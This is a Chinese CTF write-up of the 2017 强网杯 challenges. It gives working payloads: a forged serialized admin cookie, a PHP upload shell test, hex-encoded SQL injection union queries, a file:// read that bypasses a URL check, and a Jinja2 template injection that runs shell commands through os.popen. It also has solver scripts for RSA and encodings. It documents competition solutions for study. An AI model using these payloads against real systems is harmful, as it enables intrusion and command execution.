强网杯2017

web1——broken

给了一段jsfuck 粘贴到http://www.jsfuck.com/# 运行不了
修复头部为[][ 成功运行并且弹窗,但是弹窗显示 flag is not here
搞了好久,不知道问题出在哪里。。。。
最后找到jsfuck翻译的网址https://codepen.io/saintjon/pen/KNPrZe
翻译得到代码:var flag="flag{f_f_l_u_a_c_g_k}";alert('flag is not here');
然后想打人。。。。。

web2——who are you?

访问发现cookie有异常
Set-Cookie: role=Zjo1OiJ0aHJmZyI7
Zjo1OiJ0aHJmZyI7————(base64)f:5:"thrfg";——————(rot13)s:5:"guest";
为什么这里会想到rot13,因为f:5:”thrfg”;是序列化的格式,但是并没有属性f,正常来说这里应该是属性s(string),刚好f和s相差13,所以rot13。。。

构造payload:
s:5:"admin";————(rot13)f:5:"nqzva";—————(base64)Zjo1OiJucXp2YSI7

成功进入并得到提示

1
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->

构造payload:
filename=1.php&data[]=<?php phpinfo();?>
得到flag文件:
your file is in ./uploads/20e5c8e49829fd7c6cb15b6e75eda82e1.php

web3——phone number

正常注册并登陆,check.php的提示

1
<!-- 听说admin的电话藏着大秘密哦~-->

猜测是flag
所以思路应该是二次注入,然后把admin的phone显示出来
注册的时候,phone参数调用了is_numeric函数,可以十六进制绕过,并注入恶意的sql语句
需要注意的是这里是数字型的注入,而不是字符型,所以不用闭合

注入 1 order by 1#的十六进制,有效
注入1 order by 2#的十六进制,显示db_error,所以只有一个回显位置
赛后交流发现很多队伍用盲注,其实是很没必要的,肯定要先试试有没有回显位置
三句注入语句搞定:(要转为十六进制再注入)

1
2
3
1 union select table_name from information_schema.tables# 
1 union select column_name from information_schema.columns where table_name='user'#
1 union select phone from user#

1.jpg
题外话,这里发现爱春秋竟然用root运行数据库。。。。

2.jpg

web4——Musee de X

谷歌搜到类似的题目
https://fail0verflow.com/blog/2014/plaidctf2014-web200-reeekeeeeee/
主要是网站提供用户下载图片,是单纯判断http://
所以利用 #http:// 然后用file://就可以进行本地任意文件下载

任意注册一个帐号
在donate.php功能处,读取www.baidu.com,出现报错页面,知道web根目录为/var/www/html
在donate.php功能处,可以利用file:///var/www/html/manage.py#http://读取到manage.py文件
可以看到django app所在文件夹为/var/www/html/museum
file:///var/www/html/view.py#http://读取到view.py源码
进行审计,发现函数makememe()处存在jinja服务端模板注入:
跟踪text变量,发现其为username
并且add_text()函数会将注入的结果写入url下载的图片文件中
构造payload并注册username为:

1
{{ [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].popen('ls').read() }}

在donate.php处提交一个全黑的图片(百度找的图片http://telecom.26923.com/download/pic/000/325/bce2e25c7e12c1567faf9a39979a9f7e.jpg),可得flag文件名为 flag_d7934ca58e70

Paste_Image.png
再利用file:///var/www/html/flag_d7934ca58e70#http:// 进行文件读取,得到flag

Paste_Image.png
贴上读取到的manage.py和view.py的源码
manage.py

1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "museum.settings")

from django.core.management import execute_from_command_line

execute_from_command_line(sys.argv)

view.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
from django.http import HttpResponse
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect,render
from django import forms
from django.template.backends.jinja2 import jinja2
import os,urllib2,imghdr,sys
from PIL import Image, ImageFont, ImageDraw

BACK = """</br><script>
function back()
{
window.history.back()
}
</script>

<body>
<button onclick="back()">Go Back</button>
</body>"""

def user_exists(username):
if User.objects.filter(username=username).count():
return True
return False

def get_next_file(username):
bp = "/tmp/memes/"+username+"/"
if len(os.listdir(bp)) > 9:
return bp+min(os.listdir(bp), key=lambda x:os.path.getctime(bp+x))
else:
return bp+str(len(os.listdir(bp)))

def add_text(fn,fmt,text):
i = Image.open(fn)
d = ImageDraw.Draw(i)
d.text((0,0),text,(255,255,255),font=ImageFont.truetype("font.ttf", 30))
i.save(fn,format=fmt)

def save_text(fn,text,username):
filename = "/tmp/memes/" + username + "/" + "text.txt"
open(filename,'a').write(text + "\n")

def logmein(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/index.php')
return HttpResponse("Error: login failed"+BACK)
return render(request,"login.html")

def logmeout(request):
logout(request)
return redirect('/index.php')

def register(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
if user_exists(username):
return HttpResponse("Error: user exists"+BACK)
if (".." in username) or ("/" in username):
return HttpResponse("Error: invalid username"+BACK)
try:
os.mkdir("/tmp/memes/"+username)
open("/tmp/memes/" + username + "/" + "text.txt","w").write("")
except:
return HttpResponse("Error: failed to create user"+BACK)
User.objects.create_user(username,password=password)
user = authenticate(username=username, password=password)
login(request,user)
return HttpResponse("Success: your file would be stored at /tmp/memes/" + username)
return render(request,"register.html")

@login_required(login_url='/login')
def makememe(request):
username = str(request.user)
if request.method == 'POST':
url = request.POST['url']
text = request.POST['text']
if text!=username:
return HttpResponse("Screw u, hacker!")
try:
if "http://" in url:
image = urllib2.urlopen(url)
else:
url = "http://"+url
image = urllib2.urlopen(url)
except:
return HttpResponse("Error: couldn't get to that URL: " + url + BACK)
if int(image.headers["Content-Length"]) > 1024*1024:
return HttpResponse("File too large")
fn = get_next_file(username)
open(fn,"w").write(image.read())
text = jinja2.Template(text).render()
print text
add_text(fn,imghdr.what(fn),text)
my_dir = sorted(os.listdir("/tmp/memes/"+username))
my_dir.remove('text.txt')
return render(request,"make.html",{'files':my_dir})

def get_text(username,meme=None):
print meme
if meme == None:
return "fuck you!"
filename = "/tmp/memes/" + username + "/" + "text.txt"
texts = open(filename).readlines()
i = 1
print len(texts)
if int(meme) > len(texts):
return "fuck you again!"
text = texts[int(meme)-1]
t = jinja2.Template(text)
return str(t.render())

@login_required(login_url='/login')
def viewmeme(request,meme=None):
print meme
username = str(request.user)
if meme is not None:
filename = "/tmp/memes/"+username+"/"+str(meme)
ctype = str(imghdr.what(filename))
return HttpResponse(open(filename).read(),content_type="image/"+ctype)
else:
my_dir = os.listdir("/tmp/memes/"+username).remove('text.txt')
return render(request,"view.html",{'files':sorted(my_dir, key=lambda x:os.path.getctime(bp+x) )})
return HttpResponse("view"+username)

def index(request):
print [request.session[a] for a in request.session.keys()]
return render(request,"index.html",{'auth':request.user.is_authenticated()})

misc——Bubble

xinik-samak-luvag-hutaf-fysil-notok-mepek-vanyh-zipef-hilok-detok-damif-cusol-fezyx
刚开始谷歌到的是bubble冒泡算法,用了处理字符串的冒泡算法后,就不知道怎么搞了
后来谷歌到一个bubble算法。。。。。
http://bohwaz.net/p/Bubble-Babble-CLI-encoder-decoder
用作者写的php脚本,一个命令就解开了,请问这种题有意义?感觉就是浪费了时间又没学到东西。。。
php 1.php -d flag.enc
得到 flag{Ev3ry7hing_i5_bubb13s}

Paste_Image.png
贴上1.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
#!/usr/bin/php5
<?php
namespace KD2;

/*
Bubble Babble Binary Data Encoding - PHP5 Library

See http://bohwaz.net/archives/web/Bubble_Babble.html for details.

Copyright 2011 BohwaZ - http://bohwaz.net/

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, version 3 of the
License.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.

You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.

Based on :
- Bubble Babble spec: http://wiki.yak.net/589/Bubble_Babble_Encoding.txt
- Nitrxgen PHP script: http://www.nitrxgen.net/bubblebabble.php
- Bubble Babble encoder for Go: http://codereview.appspot.com/181122

Use:

$encoded = BubbleBabble::Encode('Pineapple');
// => xigak-nyryk-humil-bosek-sonax

$decoded = BubbleBabble::Decode('xigak-nyryk-humil-bosek-sonax');
// => Pineapple

If your prefer procedural code, just use:

function babble_encode($str)
{
return BubbleBabble::Encode($str);
}

function babble_decode($str)
{
return BubbleBabble::Decode($str);
}
*/

class BubbleBabble_Exception extends \Exception
{
}

class BubbleBabble
{
// The table of Babble vowels
static protected $vowels = 'aeiouy';

// The table of Babble consonants.
static protected $consonants = 'bcdfghklmnprstvzx';

// Encodes $src in a babble string
static public function Encode($src)
{
$src = (string) $src; // Just to make sure PHP doesn't casts $a = '123456789'; as an int
$out = 'x';
$c = 1; // checksum

for ($i = 0;; $i += 2)
{
if ($i >= strlen($src))
{
$out .= self::$vowels[$c%6];
$out .= self::$consonants[16];
$out .= substr(self::$vowels, $c/6, 1);
break;
}

$byte1 = ord($src[$i]);

$out .= self::$vowels[((($byte1>>6)&3)+$c)%6];
$out .= self::$consonants[($byte1>>2)&15];
$out .= self::$vowels[(($byte1&3)+($c/6))%6];

if ($i+1 >= strlen($src))
break;

$byte2 = ord($src[$i + 1]);
$out .= self::$consonants[($byte2>>4)&15];
$out .= '-';
$out .= self::$consonants[$byte2&15];

$c = ($c * 5 + $byte1 * 7 + $byte2) % 36;
}

$out .= 'x';
return $out;
}

static protected function _decode2WayByte($a1, $a2, $offset)
{
if ($a1 > 16)
throw new BubbleBabble_Exception("Corrupt string at offset ".$offset);

if ($a2 > 16)
throw new BubbleBabble_Exception("Corrupt string at offset ".($offset+2));

return ($a1 << 4) | $a2;
}

static protected function _decode3WayByte($a1, $a2, $a3, $offset, $c)
{
$high2 = ($a1 - ($c%6) + 6) % 6;

if ($high2 >= 4)
throw new BubbleBabble_Exception("Corrupt string at offset ".$offset);

if ($a2 > 16)
throw new BubbleBabble_Exception("Corrupt string at offset ".($offset+1));

$mid4 = $a2;
$low2 = ($a3 - ($c/6%6) + 6) % 6;

if ($low2 >= 4)
throw new BubbleBabble_Exception("Corrupt string at offset ".($offset+2));

return $high2<<6 | $mid4<<2 | $low2;
}

protected static function _decodeTuple($src, $pos)
{
$tuple = array(
strpos(self::$vowels, $src[0]),
strpos(self::$consonants, $src[1]),
strpos(self::$vowels, $src[2])
);

if (isset($src[3]))
{
$tuple[] = strpos(self::$consonants, $src[3]);
$tuple[] = '-';
$tuple[] = strpos(self::$consonants, $src[5]);
}

return $tuple;
}

public static function Decode($src)
{
$src = trim((string) $src);

$c = 1; // checksum

// Integrity checks
if (substr($src, 0, 1) != 'x')
throw new BubbleBabble_Exception("Corrupt string at offset 0: must begin with a 'x'");

if (substr($src, -1) != 'x')
throw new BubbleBabble_Exception("Corrupt string at offset 0: must end with a 'x'");

if (strlen($src) != 5 && strlen($src)%6 != 5)
throw new BubbleBabble_Exception("Corrupt string at offset 0: wrong length");

$src = str_split(substr($src, 1, -1), 6);
$last_tuple = count($src) - 1;
$out = '';

foreach ($src as $k=>$tuple)
{
$pos = $k * 6;
$tuple = self::_decodeTuple($tuple, $pos);

if ($k == $last_tuple)
{
if ($tuple[1] == 16)
{
if ($tuple[0] != $c % 6)
throw new BubbleBabble_Exception("Corrupt string at offset $pos (checksum)");
if ($tuple[2] != (int)($c / 6))
throw new BubbleBabble_Exception("Corrupt string at offset ".($pos+2)." (checksum)");
}
else
{
$byte = self::_decode3WayByte($tuple[0], $tuple[1], $tuple[2], $pos, $c);
$out .= chr($byte);
}
}
else
{
$byte1 = self::_decode3WayByte($tuple[0], $tuple[1], $tuple[2], $pos, $c);
$byte2 = self::_decode2WayByte($tuple[3], $tuple[5], $pos);

$out .= chr($byte1);
$out .= chr($byte2);

$c = ($c * 5 + $byte1 * 7 + $byte2) % 36;
}
}

return $out;
}

// Returns true if $string seems to be a BubbleBabble encoded string
static public function Detect($string)
{
if ($string[0] != 'x' || substr($string, -1) != 'x')
return false;

if (strlen($string) != 5 && strlen($string)%6 != 5)
return false;

if (!preg_match('/^(['.self::$consonants.self::$vowels.']{5})(-(?1))*$/', $string))
return false;

return true;
}
}

if (empty($argv[1]) || ($argv[1] == '-d' && empty($argv[2])))
{
echo "Usage: " . $argv[0] . " [-d] FILE" . PHP_EOL;
exit(1);
}

if ($argv[1] == '-d')
{
$file = $argv[2];
$decode = true;
}
else
{
$file = $argv[1];
$decode = false;
}

if ($file == '-')
{
$content = file_get_contents('php://stdin');
}
else
{
$content = file_get_contents($file);
}

try {
if ($decode)
{
echo BubbleBabble::Decode($content);
}
else
{
echo BubbleBabble::Encode($content);
echo PHP_EOL;
}
}
catch (BubbleBabble_Exception $e)
{
echo "Error: " . $e->getMessage();
echo PHP_EOL;
}
?>

crypto——RSA

拿到rsa.txt,给了n,e,c

1
2
3
n is 966808932627497190635859236054960349099463975227350564265384373280336699853387254070662881265937565163000758606154308757944030571837175048514574473061401566330836334647176655282619268592560172726526643074499534129878217409046045533656897050117438496357231575999185527675071002803951800635220029015932007465117818739948903750200830856115668691007706836952244842719419452946259275251773298338162389930518838272704908887016474007051397194588396039111216708866214614779627566959335170676055025850932631053641576566165694121420546081043285806783239296799795655191121966377590175780618944910532816988143056757054052679968538901460893571204904394975714081055455240523895653305315517745729334114549756695334171142876080477105070409544777981602152762154610738540163796164295222810243309051503090866674634440359226192530724635477051576515179864461174911975667162597286769079380660782647952944808596310476973939156187472076952935728249061137481887589103973591082872988641958270285169650803792395556363304056290077801453980822097583574309682935697260204862756923865556397686696854239564541407185709940107806536773160263764483443859425726953142964148216209968437587044617613518058779287167853349364533716458676066734216877566181514607693882375533
e is 65537
c is 168502910088858295634315070244377409556567637139736308082186369003227771936407321783557795624279162162305200436446903976385948677897665466290852769877562167487142385308027341639816401055081820497002018908896202860342391029082581621987305533097386652183849657065952062433988387640990383623264405525144003500286531262674315900537001845043225363148359766771033899680111076181672797077410584747509581932045540801777738548872747597899965366950827505529432483779821158152928899947837196391555666165486441878183288008753561108995715961920472927844877569855940505148843530998878113722830427807926679324241141182238903567682042410145345551889442158895157875798990903715105782682083886461661307063583447696168828687126956147955886493383805513557604179029050981678755054945607866353195793654108403939242723861651919152369923904002966873994811826391080318146260416978499377182540684409790357257490816203138499369634490897553227763563553981246891677613446390134477832143175248992161641698011195968792105201847976082322786623390242470226740685822218140263182024226228692159380557661591633072091945077334191987860262448385123599459647228562137369178069072804498049463136233856337817385977990145571042231795332995523988174895432819872832170029690848

这里的n设置有缺陷,n虽然大,但是pq很接近,可以用github的rsatools快速分解,也可以用yafu快速分解
得到p q
最后求出明文,这里用的是github的一个包
git clone https://github.com/hellman/libnum
然后在该文件夹中创建 rsa.py

1
2
3
4
5
6
7
8
9
import libnum
p = 31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928997877221
q = 31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928797450473
n = 966808932627497190635859236054960349099463975227350564265384373280336699853387254070662881265937565163000758606154308757944030571837175048514574473061401566330836334647176655282619268592560172726526643074499534129878217409046045533656897050117438496357231575999185527675071002803951800635220029015932007465117818739948903750200830856115668691007706836952244842719419452946259275251773298338162389930518838272704908887016474007051397194588396039111216708866214614779627566959335170676055025850932631053641576566165694121420546081043285806783239296799795655191121966377590175780618944910532816988143056757054052679968538901460893571204904394975714081055455240523895653305315517745729334114549756695334171142876080477105070409544777981602152762154610738540163796164295222810243309051503090866674634440359226192530724635477051576515179864461174911975667162597286769079380660782647952944808596310476973939156187472076952935728249061137481887589103973591082872988641958270285169650803792395556363304056290077801453980822097583574309682935697260204862756923865556397686696854239564541407185709940107806536773160263764483443859425726953142964148216209968437587044617613518058779287167853349364533716458676066734216877566181514607693882375533
e = 65537
c = 168502910088858295634315070244377409556567637139736308082186369003227771936407321783557795624279162162305200436446903976385948677897665466290852769877562167487142385308027341639816401055081820497002018908896202860342391029082581621987305533097386652183849657065952062433988387640990383623264405525144003500286531262674315900537001845043225363148359766771033899680111076181672797077410584747509581932045540801777738548872747597899965366950827505529432483779821158152928899947837196391555666165486441878183288008753561108995715961920472927844877569855940505148843530998878113722830427807926679324241141182238903567682042410145345551889442158895157875798990903715105782682083886461661307063583447696168828687126956147955886493383805513557604179029050981678755054945607866353195793654108403939242723861651919152369923904002966873994811826391080318146260416978499377182540684409790357257490816203138499369634490897553227763563553981246891677613446390134477832143175248992161641698011195968792105201847976082322786623390242470226740685822218140263182024226228692159380557661591633072091945077334191987860262448385123599459647228562137369178069072804498049463136233856337817385977990145571042231795332995523988174895432819872832170029690848
phi = (p - 1) * (q - 1)
d = libnum.modular.invmod(e, phi)
print libnum.n2s(pow(c, d, n)) #flag{d1fference_between_p_And_q_1s_t00_5mall}

运行得到 flag{d1fference_between_p_And_q_1s_t00_5mall}

crypto——SimpleMath

是由Meepwn CTF 2017修改过来的
这道题,我真的是不想说了,玄学。。。找的几个脚本都缩进很有问题,然后一些代码逻辑修改总是出错,最后总算是改对了。。。。

Paste_Image.png

其中要用到大数分解,可以用yafu也可以在线分解http://factordb.com/index.php
2.py如下,网上能找到的脚本中运行效率最高的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import itertools
import math
from sets import Set
from Crypto.Hash import *

private = 280098481791453837177137197730537158171743673148935867304957882116l
primes = [2l,2l , 19l , 31l , 59l , 97l , 127l , 3727l , 44948980991l, 1753609692783577883l , 556795634058750798159011l]
p = 1
for i in primes:
p *= i
assert p == private
md5 = Set([])
for i in range(len(primes)):
for x in itertools.combinations(primes,i):
d = 0
for item in x:
d += math.log(item,2)
if d > 120 and d <= 128:
product = 1
for item in x:
product *= item
md5.add(product)
# By Samuel
q = [0] * 15
def solve(n, l, x):
global q
if l == 15:
m = "".join(q[l - 1 : : -1])
hash = MD5.new()
hash.update(m)
if int(hash.digest().encode('hex'), 16) == x:
print 'flag{%s}' % m
return
for i in range(32, 128):
if n % i == 0:
q[l] = chr(i)
solve(n / i - 1, l + 1, x)
for x in md5:
solve((private-x)/ x, 0, x)

crypto——known

分两层
第一层是给了明文密文的对应文件,并给求解一段密文
CzVrT1wCdFoUBARGMgYgN3McVkFDQzIINxUjPD8qIi0=

其密文base64解码后,明文密文都转为16进制,或者十进制即ascii,并异或则会出现32位长度的数组,拿这个数组再和求解的密文的base64解码后的ascii码异或,得到的ascii,转化为字符串就是明文
明文密文的对应如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
jYj0ApA8korwFrDKhkBsyAfcklX81hYr:IB8hBnIHFQkRBAERABwFCDsPe0AadDEZJVkIbWMyFzo=
cneHLYmfgGRgrTg1AvOaSwH3h0B16EAq:KSgufn8uOVcdLCEBNDomchISdlIwQh9JJgUSZGQfDzk=
aLErGX34qivXaOyg91E3DPCMYZgBRH5O:KwoORHQvZwULAgU+JyE4JGpVfAAnZRQ3F283FwASewc=
jeKNhULjrXgCz9vaYY0B13s60i14u8sW:ICMAeFsiGFsIMxQlPFc3Igo9CXFSBiRMflxhYSdiPR8=
Ruevm0oFQSWbx2JC10LBzUuxh6UOejDk:GDMuQF5HO3crOCQEPlwLAGJUdXEZYCICJgMFGjcwCiM=
OKTJyBytGLk0RpMPvPJfGKDiN3GVFB63:BQ0ffEo1LUU9JxhWFB4MEyU0c1UkfhMTAAYXAxQYeHs=
42dzofTDXDALQtQd5w49C6ttKeGRThF8:fnQvTFwRAHUiLzIqFxoQJ2YTDQogAyMOBVAXBwYyCHA=
qZo7CWViBiLBNpUE0v8avrWUn5Jq8FH5:OxwkAXAgAlg4Aj8kCB4UBmMSAVIVRwAvIAAaJGocBn0=
QNWVqbR1A3LlYZCI3hcaqJhJOqfED1p5:GwgcYEIVBgA7WD8KHzQCCmAMWlISfz8wAUQ2EBZrPn0=
fGj6613YyMrhxYDZbDkGtx4VPVU40p5j:LAEhAAVGZ2gDJgEOPjcFGTEgUnQXTWMsHmMFYWIqeyI=
rKjsfdqIXLEcLrlFmu9ugrN76ZeU7P9b:OA0hRVUTJXgiJzYFChwtBT4RAEYERxlNeG81AGUKdyo=
sOWYwFMQD3n4BAQP86nxXrBOOAU4Hvos:OQkcb0QxGWA+WB1SBC8QE2tSV0s7RxU1AXQFYRosITs=
XrXFc8ALQpSRRYXYyTr0k0YHoNFyxCts:EjQTcFBPFX0rGyA0FDcZGiowSwMIBQ4yIXsWLCoZOjs=
ueeOlbGsxlzmYwZJqO3s0DWRDt50zuEN:PyMueV8VE0ICBwkLHxkbCSIrCkBTcQAoCkFlZSgvCwY=
4xLuk69rZG9y7YBJjy1GrmVOs46fh8qd:fj4HQ1hBbUMgLEofcTcDCTkdCHQRWAE1PQFmMzpiPyw=
YQAM4hBv435OgKZVxzdLSuJq5LSRqFcL:ExcKewcfFkdOWEYpISUbFSseXX8wQB0Le3kDByMcLQQ=
CZF4OGrA0IsCx1S9zkDlwKa2UH2ouubr:CRwNAnwwJnBKIgAlPl8SeikPfV8UfjZIG31iOicvLDo=
cfJFy6z12Fm7rj2WicB1OsD7Rh8G7yKU:KSABcEpBLgBILR5RNARzFDoHewIsRhNNHF1oEmUjBR0=
KZhRKypseGIELd1R02xPbbMqOJFoy0XT:ARwjZHgOJEIfLDojCgpwEWNWQWMBVxoLAX8WOitqFhw=
rLUlsnjiG2l20J7TAHxNkibPmbfodtmn:OAoeWkAZPlg9WR9UdiR2FxIsQX0IXDUqI1c2OjYuIyY=
Lo1O49TD6r1b4lRHTmGRt9bTtK01emqS:Bil6eQdOAHVMGUIEcgITCwcJfmEXDDUuOn5gZDc3Pxs=
lWWlbjsKNTKLDPZp8IyYuD7giR6gdc1t:JhEcWlEdJ3o0PzgqAj4bM2stQGoWcWAdJ2dmMjY5fzw=
Nxfz752Epf7GLkutHng3yVhbccTGEhZg:BD4tTARCZnQKDUQhCgU0NxsKXgAaYz8YLVYEEhcyFC8=
mhgdidVtIfI2Jb3FQbFmMdKxcQznb2XC:Jy4sUloTAkUzDTpUDAxyBQIGf14uURwCLWQqOzBoFgs=
rSOOAAZzPtKbjdMx9cIkqzUv92hlLdmI:OBUEeXI2DksqHzgELAoMO2oHcFgSTwIMdwc4OR4+IwE=
CCDD3JUtvHswwMeLsNqCfiv6mj7NBw4M:CQUPcgA9AUUMIwARMSMkDyAqSHAFXCFMI19nGxAtegU=
mJof2N4SY0gtin4E96BBt914ULGp7Ubj:JwwkUAE5YGIjWxQSLwB1BmpSe3EXDGZOG3kXJWUPLCI=
b9c0B9y43322oYs2m6o1i1jtDrRHIA8R:KH8oBnFOLQVJWEFUKTcycT5SVgIKBD0OCkcCHRsbdho=
cyqpk8brd139HBuAMuheshL14LGkqeAe:KT86RlhPNkMeWkBfDiw0Ah4RUVYQXRtLenkXPiM/Dy0=
XnE4jWEpvsdCFG5NZdscoON1uDnmBrW3:EigOAlkgEUEMGBclACl0DQkASlAMehlLO3E+OBAoGXs=
60tlz5XsA7fIbvGfBA4hB7tlQL48j0VN:fHY/WklCDEI7XBUvJBgGJRElDVshAiMWH3lkbThqGAY=
6b13x1u7qmwC20NP8hDfhhBmxjwW3zBI:fCR6BUtGIQYLBgQldF4PE2sMfVULXRUXNl8nAmEgDAE=
uUswRNdX8XR6AUbO0YUz7nWY2YWx3xap:PxM4QWE5MGlCMyFQBzsjDGM9bElUWwAjfGwHLWEiLzg=
wJCkSj713TR5hyLG5yRQcYkQzFk38ByM:PQwIXWAdYwBJPyFTLhcNBGYda2IAbDwrNHM7ZmoYNwU=
Oi9lHLucDnpq5ZpQsk5hbS3QZ9owzqvE:BS9yWns7IVI+BQMXczQxEiAPDFsBZmQrFAw/IigrOA0=
86doCgHjHGnXZaXRSkmguomvHXiyTsTj:cnAvWXAQHFsyLB0+HA8ZEQAPVFQWWjoMBm05LAYpGiI=
oS2epWUkI8adkshCI7lb2vdb3pdAP7Dc:JRV5U0MgAVozUxICLR0pABpTVVFRQzMYfUU0FAJtCis=
c2OMox2scZxTuOlvL6b3XS4myWqbAj2i:KXQEe1wPZkIZMQsyMyEtNR9SWwA7ZmMXN2IhNxMwfCE=
wY4He2rAY7WvkIYvTAXu1qLYhE7eCwE3:PR9/flZFJnAjXCQQLScYNQclYUZSRBsjJnBnMBEtC3s=
322l7217mbYBvjpEOlYNFJHNoOWByl7X:eXR5WgRFZQYXCSokMAQxBhwIYH0lfx80IXoHFys2eRA=
3yujD6exVJ4p3NnWUaKmiNyVyuUHEmUE:eT8+XHdBMUksIUcWdSAvFAYFcl4Key4sN0AFHRc3Gw0=
YUcDa0SiM2UJSWiQVcxfrKIC5yc8UXtP:ExMoclJHB1g3WSYsFTkoEgUHQVURfh45e0wzbQcCOhg=
KKzTvhy4dP0uo0qjExKqiTYUvakJzmYe:AQ0xYkUfLQUeO0MTKV4wKRYcckIKYQ4vOFQ7Hyg3Fy0=
NOlRfnx2cXsBkt5Q0aBv3Ig1J8pLBN7G:BAknZFUZLAMZMwAkLRp0EmMFe0VQfDBLBA0gGRAUeQ8=
m7xct5mW5a8KqbnEopOPo3b5gjRTvk49:J3EzVUdCOWZPCkstNwwvBjwUdmMMBjVPKV8CASQxenE=
PhPhff5Vj4j2SqY5HLSbVq3dkjtyU1aB:Gi4bXlURYWcQXxlUFR8YdhsoalE1RGQeJV8kLAdrLwo=
f73645EyC7Ue2JUbpOk1KfUafxpqEjJA:LHF4AAdCEUg5XCYDdCQUISMrUgIoUwIbKE0gJBcwBAk=
wR2ea1qgGwVxtqTt6yXlefx2lhkt0bxg:PRR5U1JGJVY9HCUeMh8VN2UdYV8GUy9IIl07IWI4Ni8=
CeQ9lbVOSQvk319F9fEH4IvgO86U6RQg:CSMaD18VAn4pOgUNdV94BWoCfHtXfCEdAQ1mAGQIHy8=
iqxVc7ZR5ESEC7C0p3odZLTMddFZOWSt:IzczYFBADmNPLiAjBVkCcyNXVlc5eQM3KlEWDx0NHTw=
dfdXqAA2K7EmgJ9fBKAEupcsBQhvTiP1:LiAvbkI2FQMxXDYLISR4JREveHYWRTQJDGQ4IwYzHnk=
vxBv7ob24QAOLBXq71TAExi7FShBakG3:PD4JQAQYNgNOOjIpCiwZMmRVbXImTT5NCGY4FzMxCXs=
TxffVyXIzG44Tq5RggzPprxOXaSvazWr:Hj4tUGUODHgALEdSEh90ETQDQ2MTRy81FlQDIzMgGTo=
JoGz4bHXx0lB1I8s0nRuhLfx6gsFU7GF:ACkMTAcVHGkCWx8kdyd5MGMKa0YLeTECeFIjEwdtCQ4=
9DfMYBXKlwU7LGgP0WsXevpEYRcE6LjX:cwIte2o1DHoWHCZRCikmE2MzSmsGQyc/F2czEGQWJBA=
vFFhNFoTus3YQ6QrwSp7Nzv5Yv1T860B:PAANXn0xO2UPGEA/F1gQMSQ3SQQtTyFPF0NhAWpsfgo=
YMHhIVpjBRrYsqqofh4KWmacB5MMl9ZQ:EwsDXnohJFs4OQE/NR8wLDUMDXg0WDYZDAAdGD5jFBk=
p8ZnNHSHFP9yqLMiiDX78XYB77MxzyOg:On4RWH0/B3k8O0ofNyIMKjogYQRbbQ44eQIdLSgjAS8=
CQ2EML5mbILazwi2uCeudMPRCPrDGFQE:CRd5c347YVwYIj8HPBkocSYnXEYHeAcoDWUiERUcHw0=
634tcszCnqnBPrxoYLGM2Ea0TpJlrRax:fHV/QlAELnIUGh0kFhw5LAoofn5RcDZKGkUaOSAILzA=
